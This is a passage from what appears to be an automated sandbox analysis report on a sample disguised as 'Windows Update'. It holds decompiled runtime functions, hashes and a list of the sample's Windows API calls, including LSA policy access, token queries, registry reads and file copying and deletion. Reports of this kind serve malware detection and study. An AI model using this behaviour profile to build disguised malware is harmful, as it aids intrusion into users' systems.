									_t43 = E001097EF(_t68, _t84, _t85, 1);
									_t68 = _t43;
									L25:
									__eflags = _t68 - _a8;
									if(_t68 == _a8) {
										_t50 = _a4 & 0x000000ff;
										L29:
										return _t50;
									}
									L26:
									_t40 =  &(_t85[3]);
									 *_t40 = _t85[3] | 0x00000020;
									__eflags =  *_t40;
									L27:
									_t50 = _t43 | 0xffffffff;
									goto L29;
								}
								_t83 = _t85[2];
								 *_t85 = _t83 + 1;
								_t73 =  *_t85 - _t83;
								_a8 = _t73;
								_t85[1] = _t85[6] - 1;
								__eflags = _t73;
								if(__eflags <= 0) {
									__eflags = _t84 - 0xffffffff;
									if(_t84 == 0xffffffff) {
										L20:
										_t74 = 0x483640;
										L21:
										__eflags =  *(_t74 + 4) & 0x00000020;
										if(__eflags == 0) {
											L23:
											_t43 = _a4;
											 *(_t85[2]) = _t43;
											goto L25;
										}
										_push(2);
										_push(_t68);
										_push(_t68);
										_push(_t84);
										_t43 = E0010A0FB(_t68, _t84, _t85, __eflags) & _t83;
										__eflags = _t43 - 0xffffffff;
										if(_t43 == 0xffffffff) {
											goto L26;
										}
										goto L23;
									}
									__eflags = _t84 - 0xfffffffe;
									if(_t84 == 0xfffffffe) {
										goto L20;
									}
									_t74 = ((_t84 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t84 >> 5) * 4));
									goto L21;
								}
								_push(_t73);
								_push(_t83);
								_push(_t84);
								_t68 = E001097EF(_t68, _t84, _t85, __eflags);
								goto L23;
							}
							_t58 = E00102C86();
							__eflags = _t85 - _t58 + 0x20;
							if(_t85 == _t58 + 0x20) {
								L11:
								_t60 = E0010979B(_t84);
								__eflags = _t60;
								if(_t60 != 0) {
									goto L13;
								}
								L12:
								E0010A268(_t85);
								goto L13;
							}
							_t62 = E00102C86();
							__eflags = _t85 - _t62 + 0x40;
							if(_t85 != _t62 + 0x40) {
								goto L12;
							}
							goto L11;
						}
						_t85[1] = 0;
						__eflags = _t71 & 0x00000010;
						if((_t71 & 0x00000010) == 0) {
							_t85[3] = _t71 | 0x00000020;
							goto L27;
						}
						_t82 = _t71 & 0xfffffffe;
						__eflags = _t82;
						 *_t85 = _t85[2];
						_t85[3] = _t82;
						goto L8;
					}
					_t65 = E00100A4A();
					 *_t65 = 0x22;
					L2:
					_t85[3] = _t85[3] | 0x00000020;
					return _t65 | 0xffffffff;
				}
				_t65 = E00100A4A();
				 *_t65 = 9;
				goto L2;
			}






















                                                                                                                    0x001010ec
                                                                                                                    0x001010f1
                                                                                                                    0x001010f7
                                                                                                                    0x001010fa
                                                                                                                    0x001010ff
                                                                                                                    0x00101118
                                                                                                                    0x0010111b
                                                                                                                    0x0010112b
                                                                                                                    0x0010112d
                                                                                                                    0x00101130
                                                                                                                    0x00101145
                                                                                                                    0x0010114b
                                                                                                                    0x0010114e
                                                                                                                    0x00101151
                                                                                                                    0x00101154
                                                                                                                    0x00101159
                                                                                                                    0x00101185
                                                                                                                    0x00101185
                                                                                                                    0x0010118c
                                                                                                                    0x0010120a
                                                                                                                    0x0010120b
                                                                                                                    0x0010120c
                                                                                                                    0x00101212
                                                                                                                    0x00101213
                                                                                                                    0x00101214
                                                                                                                    0x0010121c
                                                                                                                    0x0010121e
                                                                                                                    0x0010121e
                                                                                                                    0x00101221
                                                                                                                    0x0010122c
                                                                                                                    0x00101230
                                                                                                                    0x00000000
                                                                                                                    0x00101230
                                                                                                                    0x00101223
                                                                                                                    0x00101223
                                                                                                                    0x00101223
                                                                                                                    0x00101223
                                                                                                                    0x00101227
                                                                                                                    0x00101227
                                                                                                                    0x00000000
                                                                                                                    0x00101227
                                                                                                                    0x0010118e
                                                                                                                    0x00101196
                                                                                                                    0x0010119b
                                                                                                                    0x0010119e
                                                                                                                    0x001011a1
                                                                                                                    0x001011a4
                                                                                                                    0x001011a6
                                                                                                                    0x001011bf
                                                                                                                    0x001011c2
                                                                                                                    0x001011df
                                                                                                                    0x001011df
                                                                                                                    0x001011e4
                                                                                                                    0x001011e4
                                                                                                                    0x001011e8
                                                                                                                    0x001011fe
                                                                                                                    0x00101201
                                                                                                                    0x00101204
                                                                                                                    0x00000000
                                                                                                                    0x00101204
                                                                                                                    0x001011ea
                                                                                                                    0x001011ec
                                                                                                                    0x001011ed
                                                                                                                    0x001011ee
                                                                                                                    0x001011f4
                                                                                                                    0x001011f9
                                                                                                                    0x001011fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x001011fc
                                                                                                                    0x001011c4
                                                                                                                    0x001011c7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x001011d6
                                                                                                                    0x00000000
                                                                                                                    0x001011d6
                                                                                                                    0x001011a8
                                                                                                                    0x001011a9
                                                                                                                    0x001011aa
                                                                                                                    0x001011b3
                                                                                                                    0x00000000
                                                                                                                    0x001011b3
                                                                                                                    0x0010115b
                                                                                                                    0x00101163
                                                                                                                    0x00101165
                                                                                                                    0x00101173
                                                                                                                    0x00101174
                                                                                                                    0x0010117a
                                                                                                                    0x0010117c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010117e
                                                                                                                    0x0010117f
                                                                                                                    0x00000000
                                                                                                                    0x00101184
                                                                                                                    0x00101167
                                                                                                                    0x0010116f
                                                                                                                    0x00101171
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00101171
                                                                                                                    0x00101132
                                                                                                                    0x00101135
                                                                                                                    0x00101138
                                                                                                                    0x001011ba
                                                                                                                    0x00000000
                                                                                                                    0x001011ba
                                                                                                                    0x0010113d
                                                                                                                    0x0010113d
                                                                                                                    0x00101140
                                                                                                                    0x00101142
                                                                                                                    0x00000000
                                                                                                                    0x00101142
                                                                                                                    0x0010111d
                                                                                                                    0x00101122
                                                                                                                    0x0010110c
                                                                                                                    0x0010110c
                                                                                                                    0x00000000
                                                                                                                    0x00101110
                                                                                                                    0x00101101
                                                                                                                    0x00101106
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00100A4A: __getptd_noexit.LIBCMT ref: 00100A4A
                                                                                                                    • __getbuf.LIBCMT ref: 0010117F
                                                                                                                    • __lseeki64.LIBCMT ref: 001011EF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                    • String ID: @6H
                                                                                                                    • API String ID: 3311320906-2126515205
                                                                                                                    • Opcode ID: c181a644f904a2487bfcdad304fa3f83af33a5787edb318873f16d71bbf40be4
                                                                                                                    • Instruction ID: 3d5f4950e162bf9fbaff5c3b5cf76d8e0793f1b149bea6d7deeea97b864fc5bb
                                                                                                                    • Opcode Fuzzy Hash: c181a644f904a2487bfcdad304fa3f83af33a5787edb318873f16d71bbf40be4
                                                                                                                    • Instruction Fuzzy Hash: 23412472500705AFD3289F78C851A7A77E4AF55330B14C62DE9EAC76D1D7F898018B51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0005F727 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E0005F727(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t35;
				intOrPtr _t40;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t48;
				void* _t51;

				_t46 = _a8;
				if(_t46 == 0) {
					_t47 = E000591B7(0x44);
					if(_t47 == 0) {
						goto L14;
					} else {
						E00077C87(_t47, 0, 0x44);
						goto L13;
					}
				} else {
					_t2 = _t46 + 4; // 0x41895600
					_t44 =  *_t2;
					L00049DF7(_t46);
					_t51 = _t48 + 4;
					if( *((intOrPtr*)(_t44 + 0x28)) == 0) {
						_t40 = E000591B7(0x44);
						_t51 = _t51 + 4;
						if(_t40 != 0) {
							E00077C87(_t40, 0, 0x44);
							_t51 = _t51 + 0xc;
						}
						 *((intOrPtr*)(_t44 + 0x28)) = _t40;
						 *((intOrPtr*)(_t44 + 0x2c)) = 0x444e30;
					}
					if( *((char*)(_t46 + 9)) != 0) {
						_t7 = _t46 + 0xc;
						 *_t7 =  *((intOrPtr*)(_t46 + 0xc)) - 1;
						if( *_t7 == 0) {
							_t9 = _t46 + 4; // 0x41895600
							_t35 =  *((intOrPtr*)( *_t9 + 0x30));
							if(_t35 != 0) {
								 *0x481858(_t35);
							}
							 *((char*)(_t46 + 0xa)) = 0;
						}
					}
					_t47 =  *((intOrPtr*)(_t44 + 0x28));
					L13:
					if(_t47 != 0) {
						if( *((char*)(_t47 + 0x38)) == 0) {
							 *((intOrPtr*)(_t47 + 0xc)) = 0;
							 *((intOrPtr*)(_t47 + 8)) = 0;
							 *((intOrPtr*)(_t47 + 4)) = 0;
							 *((intOrPtr*)(_t47 + 0x10)) = 0;
							 *((intOrPtr*)(_t47 + 0x1c)) = 0;
							 *((intOrPtr*)(_t47 + 0x18)) = 0;
							 *((intOrPtr*)(_t47 + 0x14)) = 0;
							 *((intOrPtr*)(_t47 + 0x20)) = 0;
							 *((intOrPtr*)(_t47 + 0x2c)) = 0;
							 *((intOrPtr*)(_t47 + 0x28)) = 0;
							 *((intOrPtr*)(_t47 + 0x24)) = 0;
							 *((intOrPtr*)(_t47 + 0x30)) = 0;
							 *((char*)(_t47 + 0x39)) = 1;
						}
						return _t47;
					} else {
						L14:
						 *((char*)(_a4 + 0x1e)) = 1;
						return _t47;
					}
				}
			}










                                                                                                                    0x0005f72b
                                                                                                                    0x0005f730
                                                                                                                    0x0005f79e
                                                                                                                    0x0005f7a5
                                                                                                                    0x00000000
                                                                                                                    0x0005f7a7
                                                                                                                    0x0005f7ac
                                                                                                                    0x00000000
                                                                                                                    0x0005f7b1
                                                                                                                    0x0005f732
                                                                                                                    0x0005f733
                                                                                                                    0x0005f733
                                                                                                                    0x0005f737
                                                                                                                    0x0005f73c
                                                                                                                    0x0005f743
                                                                                                                    0x0005f74d
                                                                                                                    0x0005f74f
                                                                                                                    0x0005f754
                                                                                                                    0x0005f75b
                                                                                                                    0x0005f760
                                                                                                                    0x0005f760
                                                                                                                    0x0005f763
                                                                                                                    0x0005f766
                                                                                                                    0x0005f76d
                                                                                                                    0x0005f772
                                                                                                                    0x0005f774
                                                                                                                    0x0005f774
                                                                                                                    0x0005f777
                                                                                                                    0x0005f779
                                                                                                                    0x0005f77c
                                                                                                                    0x0005f781
                                                                                                                    0x0005f784
                                                                                                                    0x0005f78a
                                                                                                                    0x0005f78d
                                                                                                                    0x0005f78d
                                                                                                                    0x0005f777
                                                                                                                    0x0005f791
                                                                                                                    0x0005f7b4
                                                                                                                    0x0005f7b6
                                                                                                                    0x0005f7c8
                                                                                                                    0x0005f7ca
                                                                                                                    0x0005f7d1
                                                                                                                    0x0005f7d8
                                                                                                                    0x0005f7df
                                                                                                                    0x0005f7e6
                                                                                                                    0x0005f7ed
                                                                                                                    0x0005f7f4
                                                                                                                    0x0005f7fb
                                                                                                                    0x0005f802
                                                                                                                    0x0005f809
                                                                                                                    0x0005f810
                                                                                                                    0x0005f817
                                                                                                                    0x0005f81e
                                                                                                                    0x0005f81e
                                                                                                                    0x0005f826
                                                                                                                    0x0005f7b8
                                                                                                                    0x0005f7b8
                                                                                                                    0x0005f7bd
                                                                                                                    0x0005f7c3
                                                                                                                    0x0005f7c3
                                                                                                                    0x0005f7b6

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: 0ND
                                                                                                                    • API String ID: 2102423945-3294747520
                                                                                                                    • Opcode ID: a267b99868b94a5e31cdba44be911531a2e8406c5c1b768cd4217eca78ce4061
                                                                                                                    • Instruction ID: 0a5e3519809b5d703d4cdb57921417055c8683d2b7d0585d0e5a6eadf9190c55
                                                                                                                    • Opcode Fuzzy Hash: a267b99868b94a5e31cdba44be911531a2e8406c5c1b768cd4217eca78ce4061
                                                                                                                    • Instruction Fuzzy Hash: 3D31C1B1500B159BE3308F15C845753B7E4AF08718F04452CDD8A5BB82D3BEF8488BC9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E000A158C(char _a4, void _a8) {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t16;
				intOrPtr* _t19;
				void* _t23;
				signed int _t24;
				void* _t26;
				signed int _t27;

				_v8 =  *0x482960 ^ _t27;
				_t3 =  &_a4; // 0x474e28
				vswprintf(0x483d88, 0x1000,  *_t3,  &_a8);
				_t19 =  *0x474044;
				_t11 =  *_t19(0xfffffff5);
				_t12 =  *0x474074(_t11,  &_v32);
				_t24 = _v24 & 0x0000ffff;
				_t31 = _t12;
				if(_t12 == 0) {
					_t24 = 0xf;
				}
				_t13 =  *_t19(0xfffffff5);
				 *0x474078(_t13, 0xc);
				L000FDF32(_t24, _t26, _t31);
				_t16 =  *_t19(0xfffffff5, 0x47444c, 0x483d88);
				return L000FBE87( *0x474078(_t24 | 0x00000008), _t19, _v8 ^ _t27, _t23, _t24 | 0x00000008, _t26, _t16);
			}


















                                                                                                                    0x000a1599
                                                                                                                    0x000a15a2
                                                                                                                    0x000a15af
                                                                                                                    0x000a15b4
                                                                                                                    0x000a15bf
                                                                                                                    0x000a15c6
                                                                                                                    0x000a15cc
                                                                                                                    0x000a15d0
                                                                                                                    0x000a15d2
                                                                                                                    0x000a15d4
                                                                                                                    0x000a15d4
                                                                                                                    0x000a15db
                                                                                                                    0x000a15e0
                                                                                                                    0x000a15f0
                                                                                                                    0x000a15fa
                                                                                                                    0x000a1616

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintfvswprintf
                                                                                                                    • String ID: (NG
                                                                                                                    • API String ID: 1539553524-3473820303
                                                                                                                    • Opcode ID: 95b908519cb95e1d76d190736e5d4b0f828718c55be2980dc47fe8d1671b1f15
                                                                                                                    • Instruction ID: a44c80a722189bbc2e79d8caa39c214802be9a3461d3a202d92ce38b2262dcf4
                                                                                                                    • Opcode Fuzzy Hash: 95b908519cb95e1d76d190736e5d4b0f828718c55be2980dc47fe8d1671b1f15
                                                                                                                    • Instruction Fuzzy Hash: BF01D872A40148B7DB10AFF4DC45EFE33ACDB80B11F100729BA19521C1DB3499405769
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00083AC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E00083AC8(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr* _v20;
				void* _t4;
				intOrPtr* _t7;
				intOrPtr _t9;

				_t4 = E00086B56(0, 0x10000, 0x30000);
				if(_t4 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0007C6A6(_t4, __ebx, __edx);
					asm("int3");
					_t7 =  *_v20;
					if( *_t7 != 0xe06d7363 ||  *((intOrPtr*)(_t7 + 0x10)) != 3) {
						L8:
						return 0;
					} else {
						_t9 =  *((intOrPtr*)(_t7 + 0x14));
						if(_t9 == 0x19930520 || _t9 == 0x19930521 || _t9 == 0x19930522 || _t9 == 0x1994000) {
							E0007E9C8();
							asm("int3");
							L0007DE7A(0x469378);
							return 0;
						} else {
							goto L8;
						}
					}
				} else {
					return _t4;
				}
			}







                                                                                                                    0x00083ad6
                                                                                                                    0x00083ae0
                                                                                                                    0x00083ae4
                                                                                                                    0x00083ae5
                                                                                                                    0x00083ae6
                                                                                                                    0x00083ae7
                                                                                                                    0x00083ae8
                                                                                                                    0x00083ae9
                                                                                                                    0x00083aee
                                                                                                                    0x00083af5
                                                                                                                    0x00083afd
                                                                                                                    0x00083b24
                                                                                                                    0x00083b27
                                                                                                                    0x00083b05
                                                                                                                    0x00083b05
                                                                                                                    0x00083b0d
                                                                                                                    0x00083b2a
                                                                                                                    0x00083b2f
                                                                                                                    0x00083b35
                                                                                                                    0x00083b3d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00083b0d
                                                                                                                    0x00083ae2
                                                                                                                    0x00083ae3
                                                                                                                    0x00083ae3

                                                                                                                    APIs
                                                                                                                    • __controlfp_s.LIBCMT ref: 00083AD6
                                                                                                                      • Part of subcall function 00086B56: __control87.LIBCMT ref: 00086B7A
                                                                                                                    • __invoke_watson.LIBCMT ref: 00083AE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __control87__controlfp_s__invoke_watson
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1371525046-1018135373
                                                                                                                    • Opcode ID: 4b53eaab42b9ff57573e2217751ed2f7392e9cf52e54f971a8c1ca2ad5afeed9
                                                                                                                    • Instruction ID: 443f0ef4b06937746097eb578a594dc18d6b5d4e66c855eef636f4de728f9622
                                                                                                                    • Opcode Fuzzy Hash: 4b53eaab42b9ff57573e2217751ed2f7392e9cf52e54f971a8c1ca2ad5afeed9
                                                                                                                    • Instruction Fuzzy Hash: 42F0247290020186CAB9B9686849ADB73CD7F90B21F554402FA8CCF522EB90CF80C29A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:58
                                                                                                                    Total number of Limit Nodes:5
                                                                                                                    execution_graph 50270 4e50aa6 50271 4e50b06 50270->50271 50272 4e50adb PostMessageW 50270->50272 50271->50272 50273 4e50af0 50272->50273 50306 248b362 50307 248b397 GetTokenInformation 50306->50307 50309 248b3d4 50307->50309 50310 248bae6 50312 248bb12 LoadLibraryShim 50310->50312 50313 248bb40 50312->50313 50314 4e5104a 50317 4e51070 DeleteFileW 50314->50317 50316 4e5108c 50317->50316 50278 248a69a 50279 248a6c6 SetErrorMode 50278->50279 50281 248a6ef 50278->50281 50280 248a6db 50279->50280 50281->50279 50318 248a2fa 50319 248a365 50318->50319 50320 248a326 FindCloseChangeNotification 50318->50320 50319->50320 50321 248a334 50320->50321 50322 4e50356 50323 4e5037c GetTextExtentPoint32W 50322->50323 50325 4e503a9 50323->50325 50326 4e512d6 50328 4e5130b WriteFile 50326->50328 50329 4e5133d 50328->50329 50330 4e51216 50331 4e5124b GetFileType 50330->50331 50333 4e51278 50331->50333 50282 248ac5e 50283 248ac93 RegQueryValueExW 50282->50283 50285 248ace7 50283->50285 50334 248b67e 50335 248b6b6 LsaOpenPolicy 50334->50335 50337 248b6f7 50335->50337 50338 248b0be 50339 248b105 50338->50339 50340 248b10e SetConsoleCtrlHandler 50339->50340 50342 248b160 50339->50342 50341 248b11c 50340->50341 50286 248aa12 50287 248aa6f 50286->50287 50288 248aa44 SetWindowLongW 50286->50288 50287->50288 50289 248aa59 50288->50289 50290 4e510fe 50291 4e51136 CreateFileW 50290->50291 50293 4e51185 50291->50293 50294 248a5d6 50295 248a64c 50294->50295 50296 248a614 DuplicateHandle 50294->50296 50295->50296 50297 248a622 50296->50297 50298 248ab56 50300 248ab8e RegOpenKeyExW 50298->50300 50301 248abe4 50300->50301 50302 4e513ba 50303 4e513e3 CopyFileW 50302->50303 50305 4e5140a 50303->50305

                                                                                                                    Executed Functions

                                                                                                                    Function 04BA1E53 Relevance: 1.5, Instructions: 1488COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334006775.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4ba0000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 32bee799a7ed192cbf8e2a8249c2f69b18418fa93573dc29b714058cfcdf2ea5
                                                                                                                    • Instruction ID: 3c1ce2662aa52777f6170f0b5a9ac6b8449e33f31459ed0602ed686a3eb39c2e
                                                                                                                    • Opcode Fuzzy Hash: 32bee799a7ed192cbf8e2a8249c2f69b18418fa93573dc29b714058cfcdf2ea5
                                                                                                                    • Instruction Fuzzy Hash: 95F2EE74E052298FCB65DF68C894BAEBBB6BB49304F1094EAD40DA7254DB309EC5CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248B074 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 0248B10E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleCtrlHandler
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1513847179-0
                                                                                                                    • Opcode ID: 6efcc1a988e46143f4726bce80358ff401e08e9214cd2844297fb6d71ade58cf
                                                                                                                    • Instruction ID: 53b7ac0cd62366fe943eed96e181e2efb168ff43a2556ea34a886607c56da83a
                                                                                                                    • Opcode Fuzzy Hash: 6efcc1a988e46143f4726bce80358ff401e08e9214cd2844297fb6d71ade58cf
                                                                                                                    • Instruction Fuzzy Hash: 5D31B675509780AFD7138F25CC85F26BFB4EF87654F0A80DBE884CB253D224A816C7A2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E510CB Relevance: 1.6, APIs: 1, Instructions: 96fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 17 4e510cb-4e51156 21 4e51158 17->21 22 4e5115b-4e51167 17->22 21->22 23 4e5116c-4e51175 22->23 24 4e51169 22->24 25 4e51177-4e5119b CreateFileW 23->25 26 4e511c6-4e511cb 23->26 24->23 29 4e511cd-4e511d2 25->29 30 4e5119d-4e511c3 25->30 26->25 29->30
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 04E5117D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 6722822d3f394259adeb2290d924a09f17d14a1e1ce1bab2dba6562e8e741e8e
                                                                                                                    • Instruction ID: 5647108d9385e77a1307a153e14daacc9a0c94488a4952d928fbed3cb21c26c6
                                                                                                                    • Opcode Fuzzy Hash: 6722822d3f394259adeb2290d924a09f17d14a1e1ce1bab2dba6562e8e741e8e
                                                                                                                    • Instruction Fuzzy Hash: 19316D71505380AFE722CF65CD84B66FFE8EF06214F08859EE9848B2A2D375A409CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248AB26 Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 33 248ab26-248abb1 37 248abb3 33->37 38 248abb6-248abcd 33->38 37->38 40 248ac0f-248ac14 38->40 41 248abcf-248abe2 RegOpenKeyExW 38->41 40->41 42 248abe4-248ac0c 41->42 43 248ac16-248ac1b 41->43 43->42
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0248ABD5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 71445658-0
                                                                                                                    • Opcode ID: 2d8e365ab1e8b13ba2fcf91e7647c8d80e2cca882862a2136618a6c2107cee9e
                                                                                                                    • Instruction ID: 7190e6c0462fb0b88844ba9ecc011b703821623dc1ffcb439eeb38a594741850
                                                                                                                    • Opcode Fuzzy Hash: 2d8e365ab1e8b13ba2fcf91e7647c8d80e2cca882862a2136618a6c2107cee9e
                                                                                                                    • Instruction Fuzzy Hash: 1731B4725043846FE7228B65CC85F67BFBCEF06310F0884ABED809B252D264A549CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248AC1D Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 48 248ac1d-248ac9b 51 248ac9d 48->51 52 248aca0-248aca9 48->52 51->52 53 248acab 52->53 54 248acae-248acb4 52->54 53->54 55 248acb9-248acd0 54->55 56 248acb6 54->56 58 248acd2-248ace5 RegQueryValueExW 55->58 59 248ad07-248ad0c 55->59 56->55 60 248ad0e-248ad13 58->60 61 248ace7-248ad04 58->61 59->58 60->61
                                                                                                                    APIs
                                                                                                                    • RegQueryValueExW.KERNELBASE(?,00000E2C,DD0169A6,00000000,00000000,00000000,00000000), ref: 0248ACD8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3660427363-0
                                                                                                                    • Opcode ID: 1717231be3039ab1277de401b82f13aaa4627acc72fa63429b1f1dcb588b3b6c
                                                                                                                    • Instruction ID: dc77f2f455c4cb974b9065da216b2e619a6472e022a5898de551af1155a27faa
                                                                                                                    • Opcode Fuzzy Hash: 1717231be3039ab1277de401b82f13aaa4627acc72fa63429b1f1dcb588b3b6c
                                                                                                                    • Instruction Fuzzy Hash: 4D318F711053806FEB22CB21CC84F66BFB8EF06314F08849BE9848B252D264E549CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248B653 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 65 248b653-248b6d9 69 248b6db 65->69 70 248b6de-248b6e7 65->70 69->70 71 248b6e9-248b6f1 LsaOpenPolicy 70->71 72 248b736-248b73b 70->72 74 248b6f7-248b709 71->74 72->71 75 248b70b-248b733 74->75 76 248b73d-248b742 74->76 76->75
                                                                                                                    APIs
